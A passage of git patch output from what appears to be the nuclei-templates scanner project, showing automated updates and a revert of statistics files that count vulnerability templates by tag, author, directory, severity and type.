| +| bullwark | 1 | | | | | | | | | +| redhat | 1 | | | | | | | | | +| ricoh | 1 | | | | | | | | | +| iterable | 1 | | | | | | | | | +| ognl | 1 | | | | | | | | | +| flink | 1 | | | | | | | | | +| karel | 1 | | | | | | | | | +| pihole | 1 | | | | | | | | | +| newrelic | 1 | | | | | | | | | +| zookeeper | 1 | | | | | | | | | +| plone | 1 | | | | | | | | | +| fedora | 1 | | | | | | | | | +| nifi | 1 | | | | | | | | | +| default | 1 | | | | | | | | | +| lighttpd | 1 | | | | | | | | | +| websvn | 1 | | | | | | | | | +| skywalking | 1 | | | | | | | | | +| yachtcontrol | 1 | | | | | | | | | +| acexy | 1 | | | | | | | | | +| jfrog | 1 | | | | | | | | | +| lokalise | 1 | | | | | | | | | +| zms | 1 | | | | | | | | | +| haproxy | 1 | | | | | | | | | +| viewlinc | 1 | | | | | | | | | +| meraki | 1 | | | | | | | | | +| parentlink | 1 | | | | | | | | | +| circontrorl | 1 | | | | | | | | | +| panabit | 1 | | | | | | | | | +| qvisdvr | 1 | | | | | | | | | +| xvr | 1 | | | | | | | | | +| tika | 1 | | | | | | | | | +| wavlink | 1 | | | | | | | | | +| sarg | 1 | | | | | | | | | +| faraday | 1 | | | | | | | | | +| sonarcloud | 1 | | | | | | | | | +| nuxeo | 1 | | | | | | | | | +| owasp | 1 | | | | | | | | | +| graphite | 1 | | | | | | | | | +| cgi | 1 | | | | | | | | | +| elfinder | 1 | | | | | | | | | +| stripe | 1 | | | | | | | | | +| flexbe | 1 | | | | | | | | | +| jmx | 1 | | | | | | | | | +| ipstack | 1 | | | | | | | | | +| distance | 1 | | | | | | | | | +| ilo4 | 1 | | | | | | | | | +| turbocrm | 1 | | | | | | | | | +| okiko | 1 | | | | | | | | | +| streetview | 1 | | | | | | | | | +| primetek | 1 | | | | | | | | | +| yzmcms | 1 | | | | | | | | | +| octoprint | 1 | | | | | | | | | +| tongda | 1 | | | | | | | | | +| gotmls | 1 | | | | | | | | | +| bazarr | 1 | | | | | | | | | +| nordex | 1 | | | | | | | | | +| directions | 1 | | | | | | | | | +| iceflow | 1 | | | | | | | | | +| twitter-server | 1 | | | | | | | | | +| traefik | 1 | | | | | | | | | +| pacsone | 1 | | | | | | | | | +| apiman | 1 | | | | | | | | | +| camunda | 1 | | | | | | | | | +| bingmaps | 1 | | | | | | | | | +| csrf | 1 | | | | | | | | | +| mirai | 1 | | | | | | | | | +| htmli | 1 | | | | | | | | | +| route | 1 | | | | | | | | | +| simplecrm | 1 | | | | | | | | | +| dotnetnuke | 1 | | | | | | | | | +| svn | 1 | | | | | | | | | +| frontpage | 1 | | | | | | | | | +| vidyo | 1 | | | | | | | | | +| redwood | 1 | | | | | | | | | +| qdpm | 1 | | | | | | | | | +| expose | 1 | | | | | | | | | +| office365 | 1 | | | | | | | | | +| weglot | 1 | | | | | | | | | +| mailgun | 1 | | | | | | | | | +| azkaban | 1 | | | | | | | | | +| blind | 1 | | | | | | | | | +| zm | 1 | | | | | | | | | +| dvr | 1 | | | | | | | | | +| cerebro | 1 | | | | | | | | | | codemeter | 1 | | | | | | | | | +| extractor | 1 | | | | | | | | | +| subrion | 1 | | | | | | | | | +| sophos | 1 | | | | | | | | | +| email | 1 | | | | | | | | | +| jquery | 1 | | | | | | | | | +| alertmanager | 1 | | | | | | | | | +| playable | 1 | | | | | | | | | +| woocomernce | 1 | | | | | | | | | +| fortigate | 1 | | | | | | | | | +| nuuo | 1 | | | | | | | | | +| feifeicms | 1 | | | | | | | | | +| zeroshell | 1 | | | | | | | | | +| metinfo | 1 | | | | | | | | | +| clockwork | 1 | | | | | | | | | +| cscart | 1 | | | | | | | | | +| calendly | 1 | | | | | | | | | +| youtube | 1 | | | | | | | | | +| manager | 1 | | | | | | | | | +| lotuscms | 1 | | | | | | | | | +| sendgrid | 1 | | | | | | | | | +| key | 1 | | | | | | | | | +| apos | 1 | | | | | | | | | +| tinypng | 1 | | | | | | | | | +| hadoop | 1 | | | | | | | | | +| locations | 1 | | | | | | | | | +| processmaker | 1 | | | | | | | | | +| scs | 1 | | | | | | | | | +| servicenow | 1 | | | | | | | | | +| landray | 1 | | | | | | | | | +| discourse | 1 | | | | | | | | | diff --git a/TOP-10.md b/TOP-10.md index e941b1bca2..17c9c10e8a 100644 --- a/TOP-10.md +++ b/TOP-10.md @@ -1,12 +1,12 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 827 | daffainfo | 288 | cves | 831 | info | 743 | http | 2195 | -| lfi | 337 | pikpikcu | 280 | vulnerabilities | 324 | high | 641 | file | 50 | -| panel | 267 | dhiyaneshdk | 273 | exposed-panels | 264 | medium | 474 | network | 45 | +| cve | 828 | daffainfo | 288 | cves | 832 | info | 749 | http | 2205 | +| lfi | 340 | pikpikcu | 280 | vulnerabilities | 327 | high | 645 | file | 50 | +| panel | 272 | dhiyaneshdk | 278 | exposed-panels | 269 | medium | 474 | network | 45 | | xss | 258 | pdteam | 201 | technologies | 201 | critical | 294 | dns | 12 | -| wordpress | 249 | geeknik | 162 | exposures | 191 | low | 155 | | | -| exposure | 239 | dwisiswant0 | 131 | misconfiguration | 139 | | | | | +| wordpress | 252 | geeknik | 162 | exposures | 191 | low | 155 | | | +| exposure | 239 | dwisiswant0 | 131 | misconfiguration | 140 | | | | | | rce | 212 | gy741 | 81 | takeovers | 65 | | | | | | tech | 195 | pussycat0x | 72 | token-spray | 63 | | | | | -| wp-plugin | 172 | princechaddha | 66 | default-logins | 60 | | | | | +| wp-plugin | 175 | princechaddha | 66 | default-logins | 60 | | | | | | cve2020 | 164 | madrobot | 63 | file | 50 | | | | | From 02722c2334584a27ee2a40e6e7efa1f84d1ad802 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 17 Oct 2021 16:11:00 +0000 Subject: [PATCH 08/54] Auto README Update [Sun Oct 17 16:11:00 UTC 2021] :robot: --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 30671a0e64..e60fe58f03 100644 --- a/README.md +++ b/README.md @@ -53,7 +53,7 @@ An overview of the nuclei template project, including statistics on unique tags, | wp-plugin | 172 | princechaddha | 66 | default-logins | 60 | | | | | | cve2020 | 164 | madrobot | 63 | file | 50 | | | | | -**175 directories, 2366 files**. +**176 directories, 2376 files**. From 00e16b3e90d830ab9ac3bf6d611181bb12a764b4 Mon Sep 17 00:00:00 2001 From: sandeep Date: Mon, 18 Oct 2021 02:50:18 +0530 Subject: [PATCH 09/54] Revert "Auto Generated Templates Stats [Sun Oct 17 16:10:43 UTC 2021] :robot:" This reverts commit 5a0b62b8f574ffcc9fee72afa5b71b3ec4b7a141. --- TEMPLATES-STATS.json | 2 +- TEMPLATES-STATS.md | 1770 +++++++++++++++++++++--------------------- TOP-10.md | 12 +- 3 files changed, 892 insertions(+), 892 deletions(-) diff --git a/TEMPLATES-STATS.json b/TEMPLATES-STATS.json index b3ed1986da..4bed7d43d2 100644 --- a/TEMPLATES-STATS.json +++ b/TEMPLATES-STATS.json @@ -1 +1 @@ -{"tags":[{"name":"cve","count":828},{"name":"lfi","count":340},{"name":"panel","count":272},{"name":"xss","count":258},{"name":"wordpress","count":252},{"name":"exposure","count":239},{"name":"rce","count":212},{"name":"tech","count":195},{"name":"wp-plugin","count":175},{"name":"cve2020","count":164},{"name":"cve2021","count":155},{"name":"joomla","count":128},{"name":"cve2010","count":109},{"name":"cve2019","count":97},{"name":"config","count":95},{"name":"cve2018","count":88},{"name":"apache","count":73},{"name":"takeover","count":69},{"name":"default-login","count":68},{"name":"oob","count":68},{"name":"iot","count":68},{"name":"token","count":67},{"name":"token-spray","count":63},{"name":"cve2017","count":51},{"name":"file","count":50},{"name":"unauth","count":49},{"name":"network","count":43},{"name":"ssrf","count":41},{"name":"sqli","count":40},{"name":"","count":38},{"name":"redirect","count":37},{"name":"cve2016","count":37},{"name":"oracle","count":36},{"name":"logs","count":30},{"name":"google","count":30},{"name":"atlassian","count":29},{"name":"jira","count":29},{"name":"cve2015","count":29},{"name":"cisco","count":27},{"name":"cve2014","count":27},{"name":"listing","count":27},{"name":"generic","count":24},{"name":"auth-bypass","count":23},{"name":"misc","count":23},{"name":"disclosure","count":23},{"name":"router","count":21},{"name":"misconfig","count":21},{"name":"aem","count":19},{"name":"sap","count":18},{"name":"cve2012","count":18},{"name":"springboot","count":18},{"name":"debug","count":18},{"name":"php","count":16},{"name":"cve2011","count":15},{"name":"devops","count":15},{"name":"weblogic","count":14},{"name":"fuzz","count":14},{"name":"struts","count":14},{"name":"login","count":14},{"name":"cve2009","count":14},{"name":"aws","count":14},{"name":"adobe","count":13},{"name":"zoho","count":13},{"name":"deserialization","count":13},{"name":"dns","count":13},{"name":"android","count":13},{"name":"wp-theme","count":12},{"name":"dlink","count":12},{"name":"jenkins","count":12},{"name":"manageengine","count":12},{"name":"magento","count":11},{"name":"cve2013","count":11},{"name":"hp","count":10},{"name":"xxe","count":10},{"name":"intrusive","count":10},{"name":"dell","count":10},{"name":"ftp","count":9},{"name":"vmware","count":9},{"name":"kubernetes","count":9},{"name":"cve2008","count":8},{"name":"fastjson","count":8},{"name":"gitlab","count":8},{"name":"rails","count":8},{"name":"cnvd","count":8},{"name":"microsoft","count":8},{"name":"nginx","count":8},{"name":"airflow","count":8},{"name":"ruijie","count":8},{"name":"scada","count":8},{"name":"backup","count":8},{"name":"ibm","count":8},{"name":"files","count":7},{"name":"confluence","count":7},{"name":"cms","count":7},{"name":"netgear","count":7},{"name":"coldfusion","count":7},{"name":"phpmyadmin","count":6},{"name":"jetty","count":6},{"name":"nodejs","count":6},{"name":"citrix","count":6},{"name":"drupal","count":6},{"name":"lucee","count":6},{"name":"solr","count":6},{"name":"fileupload","count":6},{"name":"rconfig","count":6},{"name":"django","count":6},{"name":"docker","count":6},{"name":"camera","count":6},{"name":"api","count":6},{"name":"laravel","count":6},{"name":"dedecms","count":5},{"name":"circarlife","count":5},{"name":"tomcat","count":5},{"name":"crlf","count":5},{"name":"printer","count":5},{"name":"java","count":5},{"name":"ssti","count":5},{"name":"jolokia","count":5},{"name":"headless","count":5},{"name":"windows","count":5},{"name":"iis","count":5},{"name":"maps","count":4},{"name":"samsung","count":4},{"name":"asp","count":4},{"name":"vpn","count":4},{"name":"solarwinds","count":4},{"name":"buffalo","count":4},{"name":"symantec","count":4},{"name":"glpi","count":4},{"name":"magmi","count":4},{"name":"thinkphp","count":4},{"name":"strapi","count":4},{"name":"git","count":4},{"name":"npm","count":4},{"name":"slack","count":4},{"name":"zabbix","count":4},{"name":"zimbra","count":4},{"name":"fatpipe","count":4},{"name":"artifactory","count":4},{"name":"firmware","count":4},{"name":"proxy","count":4},{"name":"symfony","count":4},{"name":"firebase","count":4},{"name":"amazon","count":4},{"name":"hongdian","count":4},{"name":"traversal","count":4},{"name":"wso2","count":4},{"name":"moodle","count":4},{"name":"resin","count":4},{"name":"rfi","count":4},{"name":"exchange","count":4},{"name":"webserver","count":4},{"name":"grafana","count":4},{"name":"elastic","count":4},{"name":"thinkcmf","count":4},{"name":"nacos","count":3},{"name":"lansweeper","count":3},{"name":"linkerd","count":3},{"name":"tikiwiki","count":3},{"name":"github","count":3},{"name":"mail","count":3},{"name":"vbulletin","count":3},{"name":"kafka","count":3},{"name":"ebs","count":3},{"name":"terramaster","count":3},{"name":"targa","count":3},{"name":"mongodb","count":3},{"name":"cve2007","count":3},{"name":"lfr","count":3},{"name":"microstrategy","count":3},{"name":"jeesns","count":3},{"name":"prometheus","count":3},{"name":"caucho","count":3},{"name":"fanruan","count":3},{"name":"bitrix","count":3},{"name":"exposures","count":3},{"name":"kibana","count":3},{"name":"oa","count":3},{"name":"zhiyuan","count":3},{"name":"fpd","count":3},{"name":"openssh","count":3},{"name":"r-seenet","count":3},{"name":"node","count":3},{"name":"cves","count":3},{"name":"telerik","count":3},{"name":"nosqli","count":3},{"name":"openam","count":3},{"name":"druid","count":3},{"name":"backdoor","count":3},{"name":"smtp","count":3},{"name":"azure","count":3},{"name":"httpd","count":3},{"name":"bigip","count":3},{"name":"injection","count":3},{"name":"ssh","count":3},{"name":"ofbiz","count":3},{"name":"cacti","count":3},{"name":"kevinlab","count":3},{"name":"search","count":3},{"name":"opensis","count":3},{"name":"itop","count":3},{"name":"hoteldruid","count":3},{"name":"springcloud","count":3},{"name":"jellyfin","count":3},{"name":"nexus","count":3},{"name":"log","count":3},{"name":"cloud","count":3},{"name":"ilo","count":2},{"name":"prtg","count":2},{"name":"bruteforce","count":2},{"name":"vrealize","count":2},{"name":"embed","count":2},{"name":"harbor","count":2},{"name":"xxljob","count":2},{"name":"ec2","count":2},{"name":"guacamole","count":2},{"name":"places","count":2},{"name":"kong","count":2},{"name":"axis2","count":2},{"name":"fortios","count":2},{"name":"flir","count":2},{"name":"emerge","count":2},{"name":"electron","count":2},{"name":"wordfence","count":2},{"name":"waf","count":2},{"name":"rancher","count":2},{"name":"service","count":2},{"name":"smb","count":2},{"name":"db","count":2},{"name":"nagios","count":2},{"name":"prestashop","count":2},{"name":"qcubed","count":2},{"name":"leak","count":2},{"name":"oauth","count":2},{"name":"openvpn","count":2},{"name":"glassfish","count":2},{"name":"phpcollab","count":2},{"name":"seeyon","count":2},{"name":"upload","count":2},{"name":"netis","count":2},{"name":"yapi","count":2},{"name":"showdoc","count":2},{"name":"totemomail","count":2},{"name":"cache","count":2},{"name":"kentico","count":2},{"name":"grav","count":2},{"name":"frp","count":2},{"name":"lotus","count":2},{"name":"getsimple","count":2},{"name":"saltstack","count":2},{"name":"bucket","count":2},{"name":"linux","count":2},{"name":"ucmdb","count":2},{"name":"dos","count":2},{"name":"chiyu","count":2},{"name":"trixbox","count":2},{"name":"yii","count":2},{"name":"geowebserver","count":2},{"name":"aruba","count":2},{"name":"jsf","count":2},{"name":"icewarp","count":2},{"name":"minio","count":2},{"name":"splunk","count":2},{"name":"hpe","count":2},{"name":"rstudio","count":2},{"name":"s3","count":2},{"name":"huawei","count":2},{"name":"bypass","count":2},{"name":"nextjs","count":2},{"name":"middleware","count":2},{"name":"akkadian","count":2},{"name":"sharepoint","count":2},{"name":"mida","count":2},{"name":"status","count":2},{"name":"horde","count":2},{"name":"mcafee","count":2},{"name":"jboss","count":2},{"name":"voipmonitor","count":2},{"name":"mailchimp","count":2},{"name":"backups","count":2},{"name":"commax","count":2},{"name":"hostheader-injection","count":2},{"name":"idrac","count":2},{"name":"keycloak","count":2},{"name":"couchdb","count":2},{"name":"pega","count":2},{"name":"hashicorp","count":2},{"name":"odoo","count":2},{"name":"heroku","count":2},{"name":"chyrp","count":2},{"name":"hjtcloud","count":2},{"name":"sonarqube","count":2},{"name":"natshell","count":2},{"name":"qihang","count":2},{"name":"justwriting","count":2},{"name":"wuzhicms","count":2},{"name":"activemq","count":2},{"name":"sonicwall","count":2},{"name":"adminer","count":2},{"name":"ecoa","count":2},{"name":"text","count":2},{"name":"liferay","count":2},{"name":"aviatrix","count":2},{"name":"netsweeper","count":2},{"name":"maian","count":2},{"name":"vcenter","count":2},{"name":"paloalto","count":2},{"name":"tidb","count":2},{"name":"avantfax","count":2},{"name":"shellshock","count":2},{"name":"sitecore","count":2},{"name":"storage","count":2},{"name":"ecology","count":2},{"name":"cve2005","count":2},{"name":"akamai","count":2},{"name":"globalprotect","count":2},{"name":"enumeration","count":2},{"name":"jeedom","count":2},{"name":"spark","count":2},{"name":"favicon","count":2},{"name":"chamilo","count":2},{"name":"openfire","count":2},{"name":"payara","count":2},{"name":"dolibarr","count":2},{"name":"nextcloud","count":2},{"name":"rockmongo","count":2},{"name":"axis","count":2},{"name":"bitly","count":2},{"name":"hasura","count":2},{"name":"plesk","count":2},{"name":"webcam","count":2},{"name":"igs","count":2},{"name":"cocoon","count":1},{"name":"ns","count":1},{"name":"gogs","count":1},{"name":"rmi","count":1},{"name":"csrfguard","count":1},{"name":"lg-nas","count":1},{"name":"nomad","count":1},{"name":"domxss","count":1},{"name":"geocode","count":1},{"name":"esmtp","count":1},{"name":"bookstack","count":1},{"name":"limit","count":1},{"name":"linkedin","count":1},{"name":"fiori","count":1},{"name":"eg","count":1},{"name":"mobileiron","count":1},{"name":"cse","count":1},{"name":"geddy","count":1},{"name":"rhymix","count":1},{"name":"lanproxy","count":1},{"name":"hortonworks","count":1},{"name":"rockethchat","count":1},{"name":"opensmtpd","count":1},{"name":"rdp","count":1},{"name":"sentry","count":1},{"name":"testrail","count":1},{"name":"clusterengine","count":1},{"name":"seacms","count":1},{"name":"vnc","count":1},{"name":"craftcms","count":1},{"name":"ulterius","count":1},{"name":"bigbluebutton","count":1},{"name":"checkpoint","count":1},{"name":"dvwa","count":1},{"name":"fortilogger","count":1},{"name":"timesheet","count":1},{"name":"codeigniter","count":1},{"name":"aspnuke","count":1},{"name":"key","count":1},{"name":"redwood","count":1},{"name":"office365","count":1},{"name":"ruby","count":1},{"name":"wavemaker","count":1},{"name":"instagram","count":1},{"name":"ghost","count":1},{"name":"jquery","count":1},{"name":"fastcgi","count":1},{"name":"netdata","count":1},{"name":"mailgun","count":1},{"name":"blackboard","count":1},{"name":"zenario","count":1},{"name":"dotclear","count":1},{"name":"htmli","count":1},{"name":"bolt","count":1},{"name":"rsyncd","count":1},{"name":"maccmsv10","count":1},{"name":"parentlink","count":1},{"name":"eprints","count":1},{"name":"phpfastcache","count":1},{"name":"mara","count":1},{"name":"jeewms","count":1},{"name":"bing","count":1},{"name":"nps","count":1},{"name":"zms","count":1},{"name":"h3c-imc","count":1},{"name":"rabbitmq","count":1},{"name":"spotify","count":1},{"name":"comodo","count":1},{"name":"scimono","count":1},{"name":"directions","count":1},{"name":"panabit","count":1},{"name":"javascript","count":1},{"name":"octobercms","count":1},{"name":"erp-nc","count":1},{"name":"nifi","count":1},{"name":"twitter-server","count":1},{"name":"grails","count":1},{"name":"whm","count":1},{"name":"jnoj","count":1},{"name":"empirecms","count":1},{"name":"gunicorn","count":1},{"name":"solman","count":1},{"name":"tensorboard","count":1},{"name":"lotuscms","count":1},{"name":"timeclock","count":1},{"name":"iterable","count":1},{"name":"route","count":1},{"name":"74cms","count":1},{"name":"mkdocs","count":1},{"name":"auth","count":1},{"name":"weather","count":1},{"name":"owa","count":1},{"name":"elascticsearch","count":1},{"name":"tcexam","count":1},{"name":"etherpad","count":1},{"name":"cofax","count":1},{"name":"cherokee","count":1},{"name":"pagespeed","count":1},{"name":"netmask","count":1},{"name":"jitsi","count":1},{"name":"lighttpd","count":1},{"name":"pihole","count":1},{"name":"monitorix","count":1},{"name":"ems","count":1},{"name":"websphere","count":1},{"name":"gitlist","count":1},{"name":"gespage","count":1},{"name":"rubedo","count":1},{"name":"soar","count":1},{"name":"wifisky","count":1},{"name":"javafaces","count":1},{"name":"resourcespace","count":1},{"name":"stripe","count":1},{"name":"myucms","count":1},{"name":"phalcon","count":1},{"name":"tor","count":1},{"name":"robomongo","count":1},{"name":"sophos","count":1},{"name":"miscrsoft","count":1},{"name":"oscommerce","count":1},{"name":"alibaba","count":1},{"name":"glances","count":1},{"name":"ueditor","count":1},{"name":"werkzeug","count":1},{"name":"acontent","count":1},{"name":"nordex","count":1},{"name":"twitter","count":1},{"name":"secmail","count":1},{"name":"contentkeeper","count":1},{"name":"expn","count":1},{"name":"autocomplete","count":1},{"name":"sprintful","count":1},{"name":"smartsense","count":1},{"name":"travis","count":1},{"name":"dropbox","count":1},{"name":"distance","count":1},{"name":"nsasg","count":1},{"name":"webmin","count":1},{"name":"realteo","count":1},{"name":"youtube","count":1},{"name":"avalanche","count":1},{"name":"gurock","count":1},{"name":"sidekiq","count":1},{"name":"avtech","count":1},{"name":"spidercontrol","count":1},{"name":"ecom","count":1},{"name":"luftguitar","count":1},{"name":"graph","count":1},{"name":"sco","count":1},{"name":"pacsone","count":1},{"name":"wondercms","count":1},{"name":"xvr","count":1},{"name":"clickhouse","count":1},{"name":"shoretel","count":1},{"name":"mariadb","count":1},{"name":"mirai","count":1},{"name":"olivetti","count":1},{"name":"mongoshake","count":1},{"name":"place","count":1},{"name":"spectracom","count":1},{"name":"goahead","count":1},{"name":"graphite","count":1},{"name":"plc","count":1},{"name":"phpfusion","count":1},{"name":"matrix","count":1},{"name":"moinmoin","count":1},{"name":"shoppable","count":1},{"name":"circleci","count":1},{"name":"nedi","count":1},{"name":"gilacms","count":1},{"name":"motorola","count":1},{"name":"acexy","count":1},{"name":"square","count":1},{"name":"expressjs","count":1},{"name":"fortiweb","count":1},{"name":"kindeditor","count":1},{"name":"discord","count":1},{"name":"package","count":1},{"name":"tugboat","count":1},{"name":"exacqvision","count":1},{"name":"biometrics","count":1},{"name":"opencast","count":1},{"name":"burp","count":1},{"name":"portainer","count":1},{"name":"livezilla","count":1},{"name":"feifeicms","count":1},{"name":"sourcebans","count":1},{"name":"email","count":1},{"name":"openemr","count":1},{"name":"jaspersoft","count":1},{"name":"appweb","count":1},{"name":"kubeflow","count":1},{"name":"aura","count":1},{"name":"wamp","count":1},{"name":"adb","count":1},{"name":"starttls","count":1},{"name":"smi","count":1},{"name":"glowroot","count":1},{"name":"axiom","count":1},{"name":"linksys","count":1},{"name":"zyxel","count":1},{"name":"visionhub","count":1},{"name":"powercreator","count":1},{"name":"springframework","count":1},{"name":"mrtg","count":1},{"name":"loqate","count":1},{"name":"weglot","count":1},{"name":"postmark","count":1},{"name":"saltapi","count":1},{"name":"argussurveillance","count":1},{"name":"fortigates","count":1},{"name":"elfinder","count":1},{"name":"hadoop","count":1},{"name":"concrete","count":1},{"name":"circle","count":1},{"name":"stem","count":1},{"name":"sar2html","count":1},{"name":"upnp","count":1},{"name":"acme","count":1},{"name":"phpunit","count":1},{"name":"beanstalk","count":1},{"name":"xmlchart","count":1},{"name":"woocomernce","count":1},{"name":"wavlink","count":1},{"name":"nexusdb","count":1},{"name":"pyramid","count":1},{"name":"ipstack","count":1},{"name":"rocketchat","count":1},{"name":"fedora","count":1},{"name":"nuuo","count":1},{"name":"crm","count":1},{"name":"mapbox","count":1},{"name":"arl","count":1},{"name":"api-manager","count":1},{"name":"redhat","count":1},{"name":"redcap","count":1},{"name":"mdb","count":1},{"name":"spf","count":1},{"name":"panasonic","count":1},{"name":"details","count":1},{"name":"database","count":1},{"name":"pmb","count":1},{"name":"actuator","count":1},{"name":"cyberoam","count":1},{"name":"beanshell","count":1},{"name":"pcoip","count":1},{"name":"webmodule-ee","count":1},{"name":"thinkadmin","count":1},{"name":"opensns","count":1},{"name":"kafdrop","count":1},{"name":"tjws","count":1},{"name":"yachtcontrol","count":1},{"name":"xdcms","count":1},{"name":"circontrorl","count":1},{"name":"razor","count":1},{"name":"setup","count":1},{"name":"addpac","count":1},{"name":"eyou","count":1},{"name":"alerta","count":1},{"name":"emby","count":1},{"name":"kyan","count":1},{"name":"geolocation","count":1},{"name":"qsan","count":1},{"name":"cves2001","count":1},{"name":"keenetic","count":1},{"name":"zookeeper","count":1},{"name":"hiawatha","count":1},{"name":"apiman","count":1},{"name":"roads","count":1},{"name":"dotnet","count":1},{"name":"svn","count":1},{"name":"sureline","count":1},{"name":"calendarix","count":1},{"name":"webadmin","count":1},{"name":"netrc","count":1},{"name":"processmaker","count":1},{"name":"influxdb","count":1},{"name":"jmx","count":1},{"name":"cors","count":1},{"name":"visualstudio","count":1},{"name":"streetview","count":1},{"name":"accela","count":1},{"name":"karel","count":1},{"name":"panos","count":1},{"name":"mediumish","count":1},{"name":"anchorcms","count":1},{"name":"wing-ftp","count":1},{"name":"phpinfo","count":1},{"name":"flexbe","count":1},{"name":"scs","count":1},{"name":"selea","count":1},{"name":"ricoh","count":1},{"name":"sqlite","count":1},{"name":"cve2006","count":1},{"name":"b2evolution","count":1},{"name":"nerdgraph","count":1},{"name":"lutron","count":1},{"name":"simplecrm","count":1},{"name":"gridx","count":1},{"name":"jenkin","count":1},{"name":"asus","count":1},{"name":"loganalyzer","count":1},{"name":"servicedesk","count":1},{"name":"xunchi","count":1},{"name":"tamronos","count":1},{"name":"dompdf","count":1},{"name":"pippoint","count":1},{"name":"openweather","count":1},{"name":"jsp","count":1},{"name":"xampp","count":1},{"name":"buttercms","count":1},{"name":"cgi","count":1},{"name":"cerebro","count":1},{"name":"adiscon","count":1},{"name":"viewlinc","count":1},{"name":"majordomo2","count":1},{"name":"flink","count":1},{"name":"elasticsearch","count":1},{"name":"perl","count":1},{"name":"proftpd","count":1},{"name":"nimble","count":1},{"name":"webftp","count":1},{"name":"shopizer","count":1},{"name":"clave","count":1},{"name":"skywalking","count":1},{"name":"messaging","count":1},{"name":"fastapi","count":1},{"name":"lancom","count":1},{"name":"sql","count":1},{"name":"tieline","count":1},{"name":"woocommerce","count":1},{"name":"cscart","count":1},{"name":"floc","count":1},{"name":"interlib","count":1},{"name":"websvn","count":1},{"name":"wildfly","count":1},{"name":"zmanda","count":1},{"name":"shopware","count":1},{"name":"subrion","count":1},{"name":"pulsesecure","count":1},{"name":"syslog","count":1},{"name":"openstack","count":1},{"name":"elevation","count":1},{"name":"vidyo","count":1},{"name":"wooyun","count":1},{"name":"spip","count":1},{"name":"clockwork","count":1},{"name":"remkon","count":1},{"name":"gitea","count":1},{"name":"tapestry","count":1},{"name":"tika","count":1},{"name":"traefik","count":1},{"name":"nweb2fax","count":1},{"name":"digitalocean","count":1},{"name":"imap","count":1},{"name":"idemia","count":1},{"name":"haproxy","count":1},{"name":"ssl","count":1},{"name":"openerp","count":1},{"name":"commscope","count":1},{"name":"omi","count":1},{"name":"phpshowtime","count":1},{"name":"postgres","count":1},{"name":"st","count":1},{"name":"speed","count":1},{"name":"wakatime","count":1},{"name":"gstorage","count":1},{"name":"nuxeo","count":1},{"name":"achecker","count":1},{"name":"sarg","count":1},{"name":"oidc","count":1},{"name":"opentsdb","count":1},{"name":"kerbynet","count":1},{"name":"bedita","count":1},{"name":"cobub","count":1},{"name":"froxlor","count":1},{"name":"rujjie","count":1},{"name":"rmc","count":1},{"name":"optiLink","count":1},{"name":"nearby","count":1},{"name":"dvr","count":1},{"name":"minimouse","count":1},{"name":"mautic","count":1},{"name":"zte","count":1},{"name":"extractor","count":1},{"name":"clockwatch","count":1},{"name":"trilithic","count":1},{"name":"myvuehelp","count":1},{"name":"clink-office","count":1},{"name":"ognl","count":1},{"name":"okta","count":1},{"name":"metabase","count":1},{"name":"graylog","count":1},{"name":"iceflow","count":1},{"name":"blind","count":1},{"name":"qdpm","count":1},{"name":"drone","count":1},{"name":"expose","count":1},{"name":"locations","count":1},{"name":"duomicms","count":1},{"name":"ruckus","count":1},{"name":"placeos","count":1},{"name":"cockpit","count":1},{"name":"metinfo","count":1},{"name":"opm","count":1},{"name":"darkstat","count":1},{"name":"varnish","count":1},{"name":"pivotaltracker","count":1},{"name":"maxsite","count":1},{"name":"zeroshell","count":1},{"name":"tracer","count":1},{"name":"visualtools","count":1},{"name":" default-login","count":1},{"name":"salesforce","count":1},{"name":"plone","count":1},{"name":"deviantart","count":1},{"name":"chevereto","count":1},{"name":"blue-ocean","count":1},{"name":"zarafa","count":1},{"name":"krweb","count":1},{"name":"natemail","count":1},{"name":"timezone","count":1},{"name":"nc2","count":1},{"name":"xml","count":1},{"name":"magicflow","count":1},{"name":"gloo","count":1},{"name":"sage","count":1},{"name":"totaljs","count":1},{"name":"wazuh","count":1},{"name":"plugin","count":1},{"name":"basic-auth","count":1},{"name":"apos","count":1},{"name":"hiboss","count":1},{"name":"cve202","count":1},{"name":"jenzabar","count":1},{"name":"mantis","count":1},{"name":"okiko","count":1},{"name":"javamelody","count":1},{"name":"photo","count":1},{"name":"dnssec","count":1},{"name":"graphql","count":1},{"name":"terraform","count":1},{"name":"ilo4","count":1},{"name":"yealink","count":1},{"name":"episerver","count":1},{"name":"postmessage","count":1},{"name":"novnc","count":1},{"name":"tensorflow","count":1},{"name":"newrelic","count":1},{"name":"fortinet","count":1},{"name":"openx","count":1},{"name":"eyelock","count":1},{"name":"announcekit","count":1},{"name":"gateone","count":1},{"name":"tinypng","count":1},{"name":"szhe","count":1},{"name":"ganglia","count":1},{"name":"bazarr","count":1},{"name":"spring","count":1},{"name":"openrestry","count":1},{"name":"embedthis","count":1},{"name":"codemeter","count":1},{"name":"qvisdvr","count":1},{"name":"xiuno","count":1},{"name":"bingmaps","count":1},{"name":"playable","count":1},{"name":"synnefo","count":1},{"name":"moin","count":1},{"name":"raspap","count":1},{"name":"cloudinary","count":1},{"name":"k8s","count":1},{"name":"find","count":1},{"name":"smartblog","count":1},{"name":"memcached","count":1},{"name":"discourse","count":1},{"name":"huijietong","count":1},{"name":"dotnetnuke","count":1},{"name":"netgenie","count":1},{"name":"zm","count":1},{"name":"calendly","count":1},{"name":"mpsec","count":1},{"name":"solarlog","count":1},{"name":"phpwiki","count":1},{"name":"logontracer","count":1},{"name":"wiki","count":1},{"name":"doh","count":1},{"name":"redis","count":1},{"name":"asana","count":1},{"name":"artica","count":1},{"name":"fuelcms","count":1},{"name":"yzmcms","count":1},{"name":"couchbase","count":1},{"name":"emc","count":1},{"name":"owasp","count":1},{"name":"tenda","count":1},{"name":"svnserve","count":1},{"name":"oneblog","count":1},{"name":"diris","count":1},{"name":"frontpage","count":1},{"name":"weiphp","count":1},{"name":"klog","count":1},{"name":"shiro","count":1},{"name":"cloudron","count":1},{"name":"centreon","count":1},{"name":"plastic","count":1},{"name":"iptime","count":1},{"name":"sonarcloud","count":1},{"name":"tectuus","count":1},{"name":"camunda","count":1},{"name":"meraki","count":1},{"name":"jumpcloud","count":1},{"name":"hubspot","count":1},{"name":"bash","count":1},{"name":"tpshop","count":1},{"name":"circontrol","count":1},{"name":"wmt"